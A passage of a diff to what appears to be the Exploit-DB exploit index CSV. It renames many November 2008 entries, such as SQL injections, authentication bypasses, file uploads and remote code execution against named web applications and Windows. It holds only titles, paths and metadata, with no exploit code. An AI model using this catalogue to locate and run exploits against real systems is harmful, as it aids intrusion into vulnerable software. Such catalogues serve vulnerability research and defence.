Final (Auth Bypass) SQL Injection",2008-11-09,Cyber-Zone,php,webapps,0 7072,platforms/php/webapps/7072.txt,"ZEEMATRI 3.0 - (bannerclick.php adid) SQL Injection",2008-11-09,"Hussin X",php,webapps,0 -7074,platforms/php/webapps/7074.txt,"X10media Mp3 Search Engine <= 1.6 - Remote File Disclosure",2008-11-09,THUNDER,php,webapps,0 -7075,platforms/jsp/webapps/7075.txt,"Openfire Server <= 3.6.0a - (Auth Bypass/SQL/XSS) Multiple Vulnerabilities",2008-11-09,"Andreas Kurtz",jsp,webapps,0 +7074,platforms/php/webapps/7074.txt,"X10media Mp3 Search Engine 1.6 - Remote File Disclosure",2008-11-09,THUNDER,php,webapps,0 +7075,platforms/jsp/webapps/7075.txt,"Openfire Server 3.6.0a - (Auth Bypass/SQL/XSS) Multiple Vulnerabilities",2008-11-09,"Andreas Kurtz",jsp,webapps,0 7076,platforms/php/webapps/7076.txt,"Collabtive 0.4.8 - (XSS/Auth Bypass/Upload) Multiple Vulnerabilities",2008-11-10,USH,php,webapps,0 7077,platforms/php/webapps/7077.txt,"OTManager CMS 2.4 - (Tipo) Remote File Inclusion",2008-11-10,Colt7r,php,webapps,0 7078,platforms/php/webapps/7078.txt,"Joomla Component JooBlog 0.1.1 - (PostID) SQL Injection",2008-11-10,boom3rang,php,webapps,0 @@ -6655,19 +6655,19 @@ id,file,description,date,author,platform,type,port 7093,platforms/php/webapps/7093.txt,"Joomla Component Contact Info 1.0 - SQL Injection",2008-11-11,boom3rang,php,webapps,0 7094,platforms/php/webapps/7094.txt,"Pre Real Estate Listings File Upload",2008-11-11,BackDoor,php,webapps,0 7095,platforms/php/webapps/7095.txt,"Joomla/Mambo com_catalogproduction (id) SQL Injection",2008-11-11,boom3rang,php,webapps,0 -7096,platforms/php/webapps/7096.txt,"Joomla Component Simple RSS Reader 1.0 - RFI",2008-11-11,NoGe,php,webapps,0 +7096,platforms/php/webapps/7096.txt,"Joomla Component Simple RSS Reader 1.0 - Remote File Inclusion",2008-11-11,NoGe,php,webapps,0 7097,platforms/php/webapps/7097.txt,"Joomla Component com_marketplace 1.2.1 - (catid) SQL Injection",2008-11-11,TR-ShaRk,php,webapps,0 -7098,platforms/php/webapps/7098.txt,"PozScripts Business Directory Script - (cid) Remote SQL Injection",2008-11-11,"Hussin X",php,webapps,0 +7098,platforms/php/webapps/7098.txt,"PozScripts Business Directory Script - (cid) SQL Injection",2008-11-11,"Hussin X",php,webapps,0 7099,platforms/windows/dos/7099.pl,"Castle Rock Computing SNMPc < 7.1.1 - (Community) Remote BoF PoC",2008-11-12,"Praveen Darshanam",windows,dos,0 -7100,platforms/linux/dos/7100.pl,"Net-SNMP <= 5.1.4/5.2.4/5.4.1 Perl Module Buffer Overflow PoC",2008-11-12,"Praveen Darshanam",linux,dos,0 +7100,platforms/linux/dos/7100.pl,"Net-SNMP 5.1.4/5.2.4/5.4.1 Perl Module Buffer Overflow PoC",2008-11-12,"Praveen Darshanam",linux,dos,0 7101,platforms/php/webapps/7101.txt,"AlstraSoft SendIt Pro Remote File Upload",2008-11-12,ZoRLu,php,webapps,0 7102,platforms/php/webapps/7102.txt,"AlstraSoft Article Manager Pro - (Auth Bypass) SQL Injection",2008-11-12,ZoRLu,php,webapps,0 7103,platforms/php/webapps/7103.txt,"AlstraSoft Web Host Directory - (Auth Bypass) SQL Injection",2008-11-12,ZoRLu,php,webapps,0 7104,platforms/windows/remote/7104.c,"Microsoft Windows Server - Code Execution Exploit (MS08-067)",2008-11-12,Polymorphours,windows,remote,135 -7105,platforms/php/webapps/7105.txt,"Quick Poll Script (code.php id) Remote SQL Injection",2008-11-12,"Hussin X",php,webapps,0 +7105,platforms/php/webapps/7105.txt,"Quick Poll Script (code.php id) SQL Injection",2008-11-12,"Hussin X",php,webapps,0 7106,platforms/php/webapps/7106.txt,"turnkeyforms Local Classifieds Auth Bypass",2008-11-12,G4N0K,php,webapps,0 7107,platforms/php/webapps/7107.txt,"turnkeyforms Web Hosting Directory - Multiple Vulnerabilities",2008-11-12,G4N0K,php,webapps,0 -7109,platforms/windows/dos/7109.txt,"Pi3Web <= 2.0.3 - (ISAPI) Remote Denial of Service Exploit",2008-11-13,"Hamid Ebadi",windows,dos,0 +7109,platforms/windows/dos/7109.txt,"Pi3Web 2.0.3 - (ISAPI) Remote Denial of Service Exploit",2008-11-13,"Hamid Ebadi",windows,dos,0 7110,platforms/php/webapps/7110.txt,"ScriptsFeed (SF) Real Estate Classifieds Software - File Upload",2008-11-13,ZoRLu,php,webapps,0 7111,platforms/php/webapps/7111.txt,"ScriptsFeed (SF) Auto Classifieds Software - Remote File Upload",2008-11-13,ZoRLu,php,webapps,0 7112,platforms/php/webapps/7112.txt,"ScriptsFeed (SF) Recipes Listing Portal Remote File Upload",2008-11-13,ZoRLu,php,webapps,0 @@ -6678,22 +6678,22 @@ id,file,description,date,author,platform,type,port 7118,platforms/php/webapps/7118.txt,"turnkeyforms Text Link Sales Auth Bypass",2008-11-14,G4N0K,php,webapps,0 7119,platforms/php/webapps/7119.php,"Discuz! 6.x/7.x - Remote Code Execution Exploit",2008-11-14,80vul,php,webapps,0 7120,platforms/asp/webapps/7120.txt,"Bankoi Webhost Panel 1.20 - (Auth Bypass) SQL Injection",2008-11-14,R3d-D3V!L,asp,webapps,0 -7121,platforms/php/webapps/7121.pl,"SlimCMS <= 1.0.0 - (edit.php) Remote SQL Injection Exploit",2008-11-14,StAkeR,php,webapps,0 +7121,platforms/php/webapps/7121.pl,"SlimCMS 1.0.0 - (edit.php) SQL Injection Exploit",2008-11-14,StAkeR,php,webapps,0 7122,platforms/php/webapps/7122.txt,"GS Real Estate Portal Multiple SQL Injection",2008-11-14,InjEctOr5,php,webapps,0 7123,platforms/php/webapps/7123.txt,"X7 Chat 2.0.5 - (Auth Bypass) SQL Injection",2008-11-14,ZoRLu,php,webapps,0 7124,platforms/php/webapps/7124.txt,"turnkeyforms Text Link Sales (id) XSS/SQL Injection",2008-11-14,ZoRLu,php,webapps,0 7125,platforms/windows/remote/7125.txt,"SmbRelay3 NTLM Replay Attack Tool/Exploit (MS08-068)",2008-11-14,"Andres Tarasco",windows,remote,0 7126,platforms/windows/dos/7126.html,"VeryPDF PDFView - OCX ActiveX OpenPDF Heap Overflow PoC",2008-11-15,r0ut3r,windows,dos,0 7128,platforms/php/webapps/7128.txt,"ClipShare Pro 2006-2007 - (chid) SQL Injection",2008-11-15,snakespc,php,webapps,0 -7129,platforms/multiple/local/7129.sh,"Sudo <= 1.6.9p18 - (Defaults setenv) Local Privilege Escalation Exploit",2008-11-15,kingcope,multiple,local,0 +7129,platforms/multiple/local/7129.sh,"Sudo 1.6.9p18 - (Defaults setenv) Local Privilege Escalation Exploit",2008-11-15,kingcope,multiple,local,0 7130,platforms/php/webapps/7130.php,"Minigal b13 - (index.php list) Remote File Disclosure Exploit",2008-11-15,"Alfons Luja",php,webapps,0 -7131,platforms/php/webapps/7131.txt,"yahoo answers (id) Remote SQL Injection",2008-11-16,snakespc,php,webapps,0 +7131,platforms/php/webapps/7131.txt,"yahoo answers (id) SQL Injection",2008-11-16,snakespc,php,webapps,0 7132,platforms/windows/remote/7132.py,"Microsoft Windows Server 2000/2003 - Code Execution Exploit (MS08-067)",2008-11-16,"Debasis Mohanty",windows,remote,445 -7133,platforms/php/webapps/7133.txt,"FloSites Blog Multiple Remote SQL Injection Vulnerabilities",2008-11-16,Vrs-hCk,php,webapps,0 +7133,platforms/php/webapps/7133.txt,"FloSites Blog Multiple SQL Injection Vulnerabilities",2008-11-16,Vrs-hCk,php,webapps,0 7134,platforms/php/webapps/7134.txt,"phpstore Wholesale (track.php?id) SQL Injection",2008-11-16,"Hussin X",php,webapps,0 7135,platforms/windows/local/7135.htm,"Opera 9.62 file:// Local Heap Overflow Exploit",2008-11-17,"Guido Landi",windows,local,0 7136,platforms/php/webapps/7136.txt,"mxCamArchive 2.2 Bypass Config Download",2008-11-17,ahmadbady,php,webapps,0 -7137,platforms/asp/webapps/7137.txt,"OpenASP <= 3.0 - Blind SQL Injection",2008-11-17,StAkeR,asp,webapps,0 +7137,platforms/asp/webapps/7137.txt,"OpenASP 3.0 - Blind SQL Injection",2008-11-17,StAkeR,asp,webapps,0 7138,platforms/php/webapps/7138.txt,"E-topbiz AdManager 4 - (group) Blind SQL Injection",2008-11-17,"Hussin X",php,webapps,0 7140,platforms/php/webapps/7140.txt,"FREEze Greetings 1.0 - Remote Password Retrieve Exploit",2008-11-17,cOndemned,php,webapps,0 7141,platforms/asp/webapps/7141.txt,"Q-Shop 3.0 - Remote XSS/SQL Injection Vulnerabilities",2008-11-17,Bl@ckbe@rD,asp,webapps,0 @@ -6704,30 +6704,30 @@ id,file,description,date,author,platform,type,port 7146,platforms/php/webapps/7146.txt,"Simple Customer 1.2 - (Auth Bypass) SQL Injection",2008-11-17,d3b4g,php,webapps,0 7147,platforms/php/webapps/7147.txt,"SaturnCMS (view) Blind SQL Injection",2008-11-17,"Hussin X",php,webapps,0 7148,platforms/php/webapps/7148.txt,"Ultrastats 0.2.144/0.3.11 - (index.php serverid) SQL Injection",2008-11-17,eek,php,webapps,0 -7149,platforms/php/webapps/7149.php,"VideoScript <= 4.0.1.50 Admin Change Password Exploit",2008-11-17,G4N0K,php,webapps,0 +7149,platforms/php/webapps/7149.php,"VideoScript 4.0.1.50 Admin Change Password Exploit",2008-11-17,G4N0K,php,webapps,0 7150,platforms/linux/dos/7150.html,"CUPS 1.3.7 - CSRF (add rss subscription) Remote Crash Exploit",2008-11-18,"Adrian ""pagvac"" Pastor",linux,dos,0 -7151,platforms/linux/remote/7151.c,"No-IP DUC <= 2.1.7 - Remote Code Execution Exploit",2008-11-18,XenoMuta,linux,remote,0 +7151,platforms/linux/remote/7151.c,"No-IP DUC 2.1.7 - Remote Code Execution Exploit",2008-11-18,XenoMuta,linux,remote,0 7152,platforms/php/webapps/7152.txt,"Musicbox 2.3.8 - (viewalbums.php artistId) SQL Injection",2008-11-18,snakespc,php,webapps,0 7153,platforms/php/webapps/7153.txt,"Pluck CMS 4.5.3 - (g_pcltar_lib_dir) Local File Inclusion",2008-11-18,DSecRG,php,webapps,0 -7155,platforms/php/webapps/7155.txt,"Free Directory Script 1.1.1 - (API_HOME_DIR) RFI",2008-11-18,"Ghost Hacker",php,webapps,0 +7155,platforms/php/webapps/7155.txt,"Free Directory Script 1.1.1 - (API_HOME_DIR) Remote File Inclusion",2008-11-18,"Ghost Hacker",php,webapps,0 7156,platforms/php/webapps/7156.txt,"E-topbiz Link Back Checker 1 Insecure Cookie Handling",2008-11-18,x0r,php,webapps,0 7157,platforms/php/webapps/7157.txt,"Alex News-Engine 1.5.1 - Remote Arbitrary File Upload",2008-11-19,Batter,php,webapps,0 7158,platforms/php/webapps/7158.txt,"Alex Article-Engine 1.3.0 - (fckeditor) Arbitrary File Upload",2008-11-19,Batter,php,webapps,0 7159,platforms/php/webapps/7159.php,"PunBB (Private Messaging System 1.2.x) - Multiple LFI Exploit",2008-11-19,StAkeR,php,webapps,0 -7160,platforms/php/webapps/7160.php,"MyTopix <= 1.3.0 - (notes send) Remote SQL Injection Exploit",2008-11-19,cOndemned,php,webapps,0 -7162,platforms/php/webapps/7162.pl,"MauryCMS <= 0.53.2 - Remote Shell Upload Exploit",2008-11-19,StAkeR,php,webapps,0 -7163,platforms/php/webapps/7163.txt,"RevSense (Auth bypass) Remote SQL Injection",2008-11-19,d3b4g,php,webapps,0 -7164,platforms/php/webapps/7164.txt,"Pre Job Board (Auth Bypass) Remote SQL Injection",2008-11-19,R3d-D3V!L,php,webapps,0 -7165,platforms/php/webapps/7165.pl,"wPortfolio <= 0.3 - Remote Arbitrary File Upload Exploit",2008-11-19,Osirys,php,webapps,0 -7166,platforms/php/webapps/7166.txt,"AskPert (Auth bypass) Remote SQL Injection",2008-11-19,TR-ShaRk,php,webapps,0 +7160,platforms/php/webapps/7160.php,"MyTopix 1.3.0 - (notes send) SQL Injection Exploit",2008-11-19,cOndemned,php,webapps,0 +7162,platforms/php/webapps/7162.pl,"MauryCMS 0.53.2 - Remote Shell Upload Exploit",2008-11-19,StAkeR,php,webapps,0 +7163,platforms/php/webapps/7163.txt,"RevSense (Auth bypass) SQL Injection",2008-11-19,d3b4g,php,webapps,0 +7164,platforms/php/webapps/7164.txt,"Pre Job Board (Auth Bypass) SQL Injection",2008-11-19,R3d-D3V!L,php,webapps,0 +7165,platforms/php/webapps/7165.pl,"wPortfolio 0.3 - Remote Arbitrary File Upload Exploit",2008-11-19,Osirys,php,webapps,0 +7166,platforms/php/webapps/7166.txt,"AskPert (Auth bypass) SQL Injection",2008-11-19,TR-ShaRk,php,webapps,0 7167,platforms/windows/remote/7167.html,"Exodus 0.10 - (uri handler) Arbitrary Parameter Injection Exploit",2008-11-20,Nine:Situations:Group,windows,remote,0 7168,platforms/php/webapps/7168.pl,"PunBB Mod PunPortal 0.1 - Local File Inclusion Exploit",2008-11-20,StAkeR,php,webapps,0 -7170,platforms/php/webapps/7170.php,"wPortfolio <= 0.3 Admin Password Changing Exploit",2008-11-20,G4N0K,php,webapps,0 +7170,platforms/php/webapps/7170.php,"wPortfolio 0.3 Admin Password Changing Exploit",2008-11-20,G4N0K,php,webapps,0 7171,platforms/multiple/local/7171.txt,"PHP 5.2.6 - (error_log) safe_mode Bypass",2008-11-20,SecurityReason,multiple,local,0 -7172,platforms/php/webapps/7172.txt,"NatterChat 1.1 - (Auth Bypass) Remote SQL Injection",2008-11-20,Bl@ckbe@rD,php,webapps,0 -7173,platforms/php/webapps/7173.php,"PHP-Fusion 7.00.1 - (messages.php) Remote SQL Injection Exploit",2008-11-20,irk4z,php,webapps,0 +7172,platforms/php/webapps/7172.txt,"NatterChat 1.1 - (Auth Bypass) SQL Injection",2008-11-20,Bl@ckbe@rD,php,webapps,0 +7173,platforms/php/webapps/7173.php,"PHP-Fusion 7.00.1 - (messages.php) SQL Injection Exploit",2008-11-20,irk4z,php,webapps,0 7174,platforms/php/webapps/7174.txt,"vBulletin 3.7.3 - Visitor Message CSRF + Worm Exploit",2008-11-20,Mx,php,webapps,0 -7175,platforms/php/webapps/7175.txt,"Natterchat 1.12 - (Auth Bypass) Remote SQL Injection",2008-11-20,Stack,php,webapps,0 +7175,platforms/php/webapps/7175.txt,"Natterchat 1.12 - (Auth Bypass) SQL Injection",2008-11-20,Stack,php,webapps,0 7176,platforms/php/webapps/7176.txt,"ToursManager (tourview.php tourid) Blind SQL Injection",2008-11-20,XaDoS,php,webapps,0 7177,platforms/linux/local/7177.c,"Oracle Database Vault - ptrace(2) Privilege Escalation Exploit",2008-11-20,"Jakub Wartak",linux,local,0 7178,platforms/windows/dos/7178.txt,"BitDefender - (module pdf.xmd) Infinite Loop Denial of Service PoC",2008-11-20,ProTeuS,windows,dos,0 @@ -6735,15 +6735,15 @@ id,file,description,date,author,platform,type,port 7180,platforms/php/webapps/7180.txt,"VCalendar (VCalendar.mdb) Remote Database Disclosure",2008-11-20,Swan,php,webapps,0 7181,platforms/windows/remote/7181.html,"KVIrc 3.4.2 Shiny (uri handler) Remote Command Execution Exploit",2008-11-21,Nine:Situations:Group,windows,remote,0 7182,platforms/php/webapps/7182.txt,"Joomla Component Thyme 1.0 - (event) SQL Injection",2008-11-21,"Ded MustD!e",php,webapps,0 -7183,platforms/linux/remote/7183.txt,"verlihub <= 0.9.8d-RC2 - Remote Command Execution",2008-11-21,v4lkyrius,linux,remote,0 +7183,platforms/linux/remote/7183.txt,"verlihub 0.9.8d-RC2 - Remote Command Execution",2008-11-21,v4lkyrius,linux,remote,0 7184,platforms/php/webapps/7184.txt,"e107 Plugin ZoGo-Shop 1.15.4 - (product) SQL Injection",2008-11-22,NoGe,php,webapps,0 7185,platforms/php/webapps/7185.php,"Discuz! Remote Reset User Password Exploit",2008-11-22,80vul,php,webapps,0 -7186,platforms/php/webapps/7186.txt,"Vlog System 1.1 - (blog.php user) Remote SQL Injection",2008-11-22,Mr.SQL,php,webapps,0 +7186,platforms/php/webapps/7186.txt,"Vlog System 1.1 - (blog.php user) SQL Injection",2008-11-22,Mr.SQL,php,webapps,0 7188,platforms/php/webapps/7188.txt,"getaphpsite Real Estate Remote File Upload",2008-11-22,ZoRLu,php,webapps,0 7189,platforms/php/webapps/7189.txt,"getaphpsite Auto Dealers Remote File Upload",2008-11-22,ZoRLu,php,webapps,0 7190,platforms/php/webapps/7190.txt,"Ez Ringtone Manager Multiple Remote File Disclosure Vulnerabilities",2008-11-22,b3hz4d,php,webapps,0 7191,platforms/php/webapps/7191.php,"LoveCMS 1.6.2 Final (Simple Forum 3.1d) Change Admin Password Exploit",2008-11-22,cOndemned,php,webapps,0 -7195,platforms/php/webapps/7195.txt,"Prozilla Hosting Index (id) Remote SQL Injection",2008-11-23,snakespc,php,webapps,0 +7195,platforms/php/webapps/7195.txt,"Prozilla Hosting Index (id) SQL Injection",2008-11-23,snakespc,php,webapps,0 7196,platforms/windows/remote/7196.html,"Microsoft XML Core Services DTD - Cross-Domain Scripting PoC (MS08-069)",2008-11-23,"Jerome Athias",windows,remote,0 7197,platforms/php/webapps/7197.txt,"Goople CMS 1.7 - Remote File Upload",2008-11-23,x0r,php,webapps,0 7198,platforms/php/webapps/7198.txt,"NetArtMedia Cars Portal 2.0 - (image.php id) SQL Injection",2008-11-23,snakespc,php,webapps,0 @@ -6751,7 +6751,7 @@ id,file,description,date,author,platform,type,port 7200,platforms/php/webapps/7200.txt,"PG Real Estate (Auth Bypass) SQL Injection",2008-11-23,ZoRLu,php,webapps,0 7201,platforms/php/webapps/7201.txt,"PG Roomate Finder Solution (Auth Bypass) SQL Injection",2008-11-23,ZoRLu,php,webapps,0 7202,platforms/php/webapps/7202.txt,"PG Job Site (poll_view_id) Blind SQL Injection",2008-11-23,ZoRLu,php,webapps,0 -7204,platforms/php/webapps/7204.txt,"modx CMS <= 0.9.6.2 - (RFI/XSS) Multiple Vulnerabilities",2008-11-23,RoMaNcYxHaCkEr,php,webapps,0 +7204,platforms/php/webapps/7204.txt,"modx CMS 0.9.6.2 - (RFI/XSS) Multiple Vulnerabilities",2008-11-23,RoMaNcYxHaCkEr,php,webapps,0 7205,platforms/php/webapps/7205.txt,"Goople CMS 1.7 Insecure Cookie Handling",2008-11-23,BeyazKurt,php,webapps,0 7206,platforms/php/webapps/7206.txt,"PHP Classifieds Script Remote Database Disclosure",2008-11-23,InjEctOr5,php,webapps,0 7207,platforms/windows/dos/7207.pl,"Nero ShowTime 5.0.15.0 m3u Playlist File Remote Buffer Overflow PoC",2008-11-24,LiquidWorm,windows,dos,0 @@ -6764,7 +6764,7 @@ id,file,description,date,author,platform,type,port 7214,platforms/php/webapps/7214.txt,"ftpzik - (XSS/LFI) Multiple Vulnerabilities",2008-11-24,JIKO,php,webapps,0 7215,platforms/php/webapps/7215.txt,"bandwebsite 1.5 - (SQL/XSS) Multiple Vulnerabilities",2008-11-24,ZoRLu,php,webapps,0 7216,platforms/php/webapps/7216.txt,"WebStudio CMS (index.php pageid) Blind SQL Injection",2008-11-24,"Glafkos Charalambous ",php,webapps,0 -7217,platforms/php/webapps/7217.pl,"Quicksilver Forums <= 1.4.2 RCE Exploit (windows only)",2008-11-24,girex,php,webapps,0 +7217,platforms/php/webapps/7217.pl,"Quicksilver Forums 1.4.2 RCE Exploit (windows only)",2008-11-24,girex,php,webapps,0 7218,platforms/php/webapps/7218.txt,"nitrotech 0.0.3a - (RFI/SQL) Multiple Vulnerabilities",2008-11-24,Osirys,php,webapps,0 7219,platforms/windows/dos/7219.pl,"Total Video Player (vcen.dll) Remote off by one Crash Exploit",2008-11-24,Cnaph,windows,dos,0 7220,platforms/hardware/dos/7220.txt,"Siemens C450IP/C475IP Remote Denial of Service",2008-11-24,"sky & Any",hardware,dos,0 @@ -6784,9 +6784,9 @@ id,file,description,date,author,platform,type,port 7234,platforms/php/webapps/7234.txt,"VideoGirls BiZ (view_snaps.php type) Blind SQL Injection",2008-11-25,Cyber-Zone,php,webapps,0 7235,platforms/php/webapps/7235.txt,"Jamit Job Board 3.x - (show_emp) Blind SQL Injection",2008-11-25,XaDoS,php,webapps,0 7236,platforms/php/webapps/7236.txt,"WebStudio CMS - (pageid) Remote Blind SQL Injection (mil mixup)",2008-11-26,"BorN To K!LL",php,webapps,0 -7237,platforms/php/webapps/7237.txt,"CMS Ortus <= 1.13 - Remote SQL Injection",2008-11-26,otmorozok428,php,webapps,0 +7237,platforms/php/webapps/7237.txt,"CMS Ortus 1.13 - SQL Injection",2008-11-26,otmorozok428,php,webapps,0 7238,platforms/php/webapps/7238.txt,"Post Affiliate Pro 3 - (umprof_status) Blind SQL Injection",2008-11-26,XaDoS,php,webapps,0 -7239,platforms/php/webapps/7239.txt,"ParsBlogger (blog.asp wr) - Remote SQL Injection",2008-11-26,"BorN To K!LL",php,webapps,0 +7239,platforms/php/webapps/7239.txt,"ParsBlogger (blog.asp wr) - SQL Injection",2008-11-26,"BorN To K!LL",php,webapps,0 7240,platforms/php/webapps/7240.txt,"Star Articles 6.0 - Remote Blind SQL Injection",2008-11-26,b3hz4d,php,webapps,0 7241,platforms/php/webapps/7241.txt,"TxtBlog (index.php m) 1.0 Alpha - Local File Inclusion",2008-11-27,"CWH Underground",php,webapps,0 7242,platforms/php/webapps/7242.txt,"web calendar system 3.12/3.30 - Multiple Vulnerabilities",2008-11-27,Bl@ckbe@rD,php,webapps,0 @@ -6796,14 +6796,14 @@ id,file,description,date,author,platform,type,port 7246,platforms/php/webapps/7246.txt,"Ocean12 Poll Manager Pro Database Disclosure",2008-11-27,Pouya_Server,php,webapps,0 7247,platforms/php/webapps/7247.txt,"Ocean12 Calendar Manager Gold Database Disclosure",2008-11-27,Pouya_Server,php,webapps,0 7248,platforms/php/webapps/7248.txt,"Family Project 2.x - (Auth Bypass) SQL Injection",2008-11-27,The_5p3ctrum,php,webapps,0 -7249,platforms/windows/dos/7249.php,"i.Scribe SMTP Client <= 2.00b (wscanf) Remote Format String PoC",2008-11-27,"Alfons Luja",windows,dos,0 +7249,platforms/windows/dos/7249.php,"i.Scribe SMTP Client 2.00b (wscanf) Remote Format String PoC",2008-11-27,"Alfons Luja",windows,dos,0 7250,platforms/php/webapps/7250.txt,"RakhiSoftware Shopping Cart (subcategory_id) SQL Injection",2008-11-27,XaDoS,php,webapps,0 7251,platforms/php/webapps/7251.txt,"Star Articles 6.0 - Remote File Upload",2008-11-27,ZoRLu,php,webapps,0 7252,platforms/php/webapps/7252.txt,"Web Calendar 4.1 - (Auth Bypass) SQL Injection",2008-11-27,Cyber-Zone,php,webapps,0 -7253,platforms/php/webapps/7253.txt,"Booking Centre 2.01 - (HotelID) Remote SQL Injection",2008-11-27,R3d-D3V!L,php,webapps,0 +7253,platforms/php/webapps/7253.txt,"Booking Centre 2.01 - (HotelID) SQL Injection",2008-11-27,R3d-D3V!L,php,webapps,0 7254,platforms/php/webapps/7254.txt,"Ocean12 Membership Manager Pro - (Auth Bypass) SQL Injection",2008-11-27,Cyber-Zone,php,webapps,0 7255,platforms/php/webapps/7255.txt,"pagetree CMS 0.0.2 beta 0001 - Remote File Inclusion",2008-11-27,NoGe,php,webapps,0 -7256,platforms/php/webapps/7256.txt,"Turnkey Arcade Script - (id) Remote SQL Injection (1)",2008-11-27,The_5p3ctrum,php,webapps,0 +7256,platforms/php/webapps/7256.txt,"Turnkey Arcade Script - (id) SQL Injection (1)",2008-11-27,The_5p3ctrum,php,webapps,0 7258,platforms/php/webapps/7258.txt,"Ocean12 FAQ Manager Pro Database Disclosure",2008-11-27,Stack,php,webapps,0 7259,platforms/asp/webapps/7259.txt,"comersus asp shopping cart - (DD/XSS) Multiple Vulnerabilities",2008-11-27,Bl@ckbe@rD,asp,webapps,0 7260,platforms/php/webapps/7260.txt,"BaSiC-CMS (acm2000.mdb) Remote Database Disclosure",2008-11-28,Stack,php,webapps,0 @@ -6811,23 +6811,23 @@ id,file,description,date,author,platform,type,port 7262,platforms/windows/dos/7262.pl,"Microsoft Office Communicator (SIP) Remote Denial of Service Exploit",2008-11-28,"Praveen Darshanam",windows,dos,0 7263,platforms/php/webapps/7263.txt,"Booking Centre 2.01 - (Auth Bypass) SQL Injection",2008-11-28,MrDoug,php,webapps,0 7264,platforms/windows/local/7264.txt,"Apache Tomcat - runtime.getRuntime().exec() Privilege Escalation (Windows)",2008-11-28,Abysssec,windows,local,0 -7265,platforms/php/webapps/7265.txt,"web calendar system <= 3.40 - (XSS/SQL) Multiple Vulnerabilities",2008-11-28,Bl@ckbe@rD,php,webapps,0 -7266,platforms/php/webapps/7266.pl,"All Club CMS <= 0.0.2 - Remote DB Config Retrieve Exploit",2008-11-28,StAkeR,php,webapps,0 +7265,platforms/php/webapps/7265.txt,"web calendar system 3.40 - (XSS/SQL) Multiple Vulnerabilities",2008-11-28,Bl@ckbe@rD,php,webapps,0 +7266,platforms/php/webapps/7266.pl,"All Club CMS 0.0.2 - Remote DB Config Retrieve Exploit",2008-11-28,StAkeR,php,webapps,0 7267,platforms/php/webapps/7267.txt,"SailPlanner 0.3a (Auth Bypass) SQL Injection",2008-11-28,JIKO,php,webapps,0 7268,platforms/php/webapps/7268.txt,"Bluo CMS 1.2 - (index.php id) Blind SQL Injection",2008-11-28,The_5p3ctrum,php,webapps,0 -7269,platforms/php/webapps/7269.pl,"CMS little (index.php term) 0.0.1 - Remote SQL Injection Exploit",2008-11-28,"CWH Underground",php,webapps,0 +7269,platforms/php/webapps/7269.pl,"CMS little (index.php term) 0.0.1 - SQL Injection Exploit",2008-11-28,"CWH Underground",php,webapps,0 7270,platforms/php/webapps/7270.txt,"ReVou Twitter Clone (Auth Bypass) SQL Injection",2008-11-28,R3d-D3V!L,php,webapps,0 7271,platforms/php/webapps/7271.txt,"Ocean12 FAQ Manager Pro (ID) Blind SQL Injection Vulnerabillity",2008-11-28,Stack,php,webapps,0 -7273,platforms/asp/webapps/7273.txt,"Active Force Matrix 2 - (Auth Bypass) Remote SQL Injection",2008-11-29,R3d-D3V!L,asp,webapps,0 +7273,platforms/asp/webapps/7273.txt,"Active Force Matrix 2 - (Auth Bypass) SQL Injection",2008-11-29,R3d-D3V!L,asp,webapps,0 7274,platforms/asp/webapps/7274.txt,"ASPReferral 5.3 - (AccountID) Blind SQL Injection",2008-11-29,R3d-D3V!L,asp,webapps,0 -7275,platforms/asp/webapps/7275.txt,"ActiveVotes 2.2 - (Auth Bypass) Remote SQL Injection",2008-11-29,R3d-D3V!L,asp,webapps,0 -7276,platforms/asp/webapps/7276.txt,"Active Test 2.1 - (Auth Bypass) Remote SQL Injection",2008-11-29,R3d-D3V!L,asp,webapps,0 -7277,platforms/asp/webapps/7277.txt,"Active Websurvey 9.1 - (Auth Bypass) Remote SQL Injection",2008-11-29,R3d-D3V!L,asp,webapps,0 -7278,platforms/asp/webapps/7278.txt,"Active Membership 2 - (Auth Bypass) Remote SQL Injection",2008-11-29,R3d-D3V!L,asp,webapps,0 -7279,platforms/asp/webapps/7279.txt,"eWebquiz 8 - (Auth Bypass) Remote SQL Injection",2008-11-29,R3d-D3V!L,asp,webapps,0 -7280,platforms/asp/webapps/7280.txt,"Active Newsletter 4.3 - (Auth Bypass) Remote SQL Injection",2008-11-29,R3d-D3V!L,asp,webapps,0 -7281,platforms/asp/webapps/7281.txt,"Active Web Mail 4 - (Auth Bypass) Remote SQL Injection",2008-11-29,R3d-D3V!L,asp,webapps,0 -7282,platforms/asp/webapps/7282.txt,"Active Trade 2 - (Auth Bypass) Remote SQL Injection",2008-11-29,R3d-D3V!L,asp,webapps,0 +7275,platforms/asp/webapps/7275.txt,"ActiveVotes 2.2 - (Auth Bypass) SQL Injection",2008-11-29,R3d-D3V!L,asp,webapps,0 +7276,platforms/asp/webapps/7276.txt,"Active Test 2.1 - (Auth Bypass) SQL Injection",2008-11-29,R3d-D3V!L,asp,webapps,0 +7277,platforms/asp/webapps/7277.txt,"Active Websurvey 9.1 - (Auth Bypass) SQL Injection",2008-11-29,R3d-D3V!L,asp,webapps,0 +7278,platforms/asp/webapps/7278.txt,"Active Membership 2 - (Auth Bypass) SQL Injection",2008-11-29,R3d-D3V!L,asp,webapps,0 +7279,platforms/asp/webapps/7279.txt,"eWebquiz 8 - (Auth Bypass) SQL Injection",2008-11-29,R3d-D3V!L,asp,webapps,0 +7280,platforms/asp/webapps/7280.txt,"Active Newsletter 4.3 - (Auth Bypass) SQL Injection",2008-11-29,R3d-D3V!L,asp,webapps,0 +7281,platforms/asp/webapps/7281.txt,"Active Web Mail 4 - (Auth Bypass) SQL Injection",2008-11-29,R3d-D3V!L,asp,webapps,0 +7282,platforms/asp/webapps/7282.txt,"Active Trade 2 - (Auth Bypass) SQL Injection",2008-11-29,R3d-D3V!L,asp,webapps,0 7283,platforms/asp/webapps/7283.txt,"Active Price Comparison 4 - (Auth Bypass) SQL Injection",2008-11-29,R3d-D3V!L,asp,webapps,0 7284,platforms/php/webapps/7284.txt,"PHP TV Portal 2.0 - (index.php mid) SQL Injection",2008-11-29,Cyber-Zone,php,webapps,0 7285,platforms/php/webapps/7285.txt,"CMS Made Simple 1.4.1 - Local File Inclusion",2008-11-29,M4ck-h@cK,php,webapps,0 @@ -6839,7 +6839,7 @@ id,file,description,date,author,platform,type,port 7291,platforms/php/webapps/7291.pl,"OpenForum 0.66 Beta Remote Reset Admin Password Exploit",2008-11-29,"CWH Underground",php,webapps,0 7292,platforms/asp/webapps/7292.txt,"ASPThai.NET Forum 8.5 - Remote Database Disclosure",2008-11-29,"CWH Underground",asp,webapps,0 7293,platforms/asp/webapps/7293.txt,"Active Web Helpdesk 2 - (Auth Bypass) SQL Injection",2008-11-29,Cyber-Zone,asp,webapps,0 